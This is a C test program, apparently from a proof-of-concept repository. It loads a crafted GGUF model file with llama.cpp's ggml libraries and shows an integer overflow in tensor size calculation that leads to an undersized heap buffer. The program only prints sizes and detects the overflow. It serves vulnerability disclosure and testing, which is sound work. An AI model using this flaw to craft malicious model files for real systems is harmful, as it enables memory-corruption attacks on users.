/* Source: llama-cpp-tensor-overflow-poc / test_tensor_overflow.c
 * Uploaded by salvepilo with huggingface_hub (commit fb05c3a, verified). */
/*
* Test program to demonstrate integer overflow in tensor size calculation.
* Loads a malicious GGUF file and shows that ggml_nbytes() returns
* an incorrect (too small) value due to integer overflow in ggml_row_size().
*
* Compile:
* cc -o test_tensor_overflow test_tensor_overflow.c \
* -I ../llama.cpp/ggml/include -I ../llama.cpp/ggml/src \
* -L ../llama.cpp/build/bin -lggml-base -lggml \
* -Wl,-rpath,../llama.cpp/build/bin
*
* Run:
* ./test_tensor_overflow poc_tensor_overflow.gguf
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <inttypes.h>
#include "ggml.h"
#include "gguf.h"
int main(int argc, char **argv) {
if (argc < 2) {
fprintf(stderr, "Usage: %s <gguf_file>\n", argv[0]);
return 1;
}
const char *fname = argv[1];
printf("=== Tensor Integer Overflow PoC ===\n");
printf("Loading: %s\n\n", fname);
struct ggml_context *ctx = NULL;
struct gguf_init_params params = {
.no_alloc = true,
.ctx = &ctx,
};
struct gguf_context *gctx = gguf_init_from_file(fname, params);
if (!gctx) {
fprintf(stderr, "ERROR: gguf_init_from_file failed!\n");
return 1;
}
printf("[+] GGUF file loaded successfully (all validation passed!)\n\n");
int n_tensors = gguf_get_n_tensors(gctx);
printf("Number of tensors: %d\n\n", n_tensors);
// Iterate over tensors and show the overflow
struct ggml_tensor *tensor = ggml_get_first_tensor(ctx);
while (tensor) {
printf("Tensor: '%s'\n", tensor->name);
printf(" Type: %s (type_size=%zu, blck_size=%" PRId64 ")\n",
ggml_type_name(tensor->type),
ggml_type_size(tensor->type),
ggml_blck_size(tensor->type));
printf(" Dimensions: ne[0]=%" PRId64 ", ne[1]=%" PRId64
", ne[2]=%" PRId64 ", ne[3]=%" PRId64 "\n",
tensor->ne[0], tensor->ne[1], tensor->ne[2], tensor->ne[3]);
printf(" Strides: nb[0]=%zu, nb[1]=%zu, nb[2]=%zu, nb[3]=%zu\n",
tensor->nb[0], tensor->nb[1], tensor->nb[2], tensor->nb[3]);
size_t nbytes = ggml_nbytes(tensor);
int64_t nelements = ggml_nelements(tensor);
// Compute what the correct size should be
// For Q4_0: correct = type_size * nelements / blck_size = 18 * ne[0] / 32
size_t type_size = ggml_type_size(tensor->type);
int64_t blck_size = ggml_blck_size(tensor->type);
// Use Python-style big number arithmetic to show correct value
// correct_nbytes = nelements * type_size / blck_size
// But we can't compute this without overflow in C, so just show the values
printf(" ggml_nbytes(): %zu bytes\n", nbytes);
printf(" ggml_nelements(): %" PRId64 "\n", nelements);
printf(" ggml_row_size(): %zu bytes\n", ggml_row_size(tensor->type, tensor->ne[0]));
// Show the overflow
size_t row_size = ggml_row_size(tensor->type, tensor->ne[0]);
printf("\n === OVERFLOW DETECTION ===\n");
printf(" ggml_row_size = type_size * ne[0] / blck_size\n");
printf(" = %zu * %" PRId64 " / %" PRId64 "\n",
type_size, tensor->ne[0], blck_size);
printf(" Computed result: %zu bytes\n", row_size);
// Check for overflow: if type_size * ne[0] / blck_size != row_size
// then overflow occurred
// We can detect this by checking: row_size * blck_size / type_size != ne[0]
if (type_size > 0 && blck_size > 0) {
int64_t reconstructed = (int64_t)(row_size * blck_size / type_size);
if (reconstructed != tensor->ne[0]) {
printf(" *** INTEGER OVERFLOW DETECTED! ***\n");
printf(" Reconstructed ne[0] from row_size: %" PRId64 "\n", reconstructed);
printf(" Actual ne[0]: %" PRId64 "\n", tensor->ne[0]);
printf(" The buffer would be %zu bytes but tensor claims %" PRId64 " elements!\n",
nbytes, nelements);
printf(" This is a HEAP BUFFER OVERFLOW vulnerability!\n");
} else {
printf(" No overflow detected for this tensor.\n");
}
}
printf("\n");
tensor = ggml_get_next_tensor(ctx, tensor);
}
ggml_free(ctx);
gguf_free(gctx);
printf("[+] Test complete.\n");
return 0;
}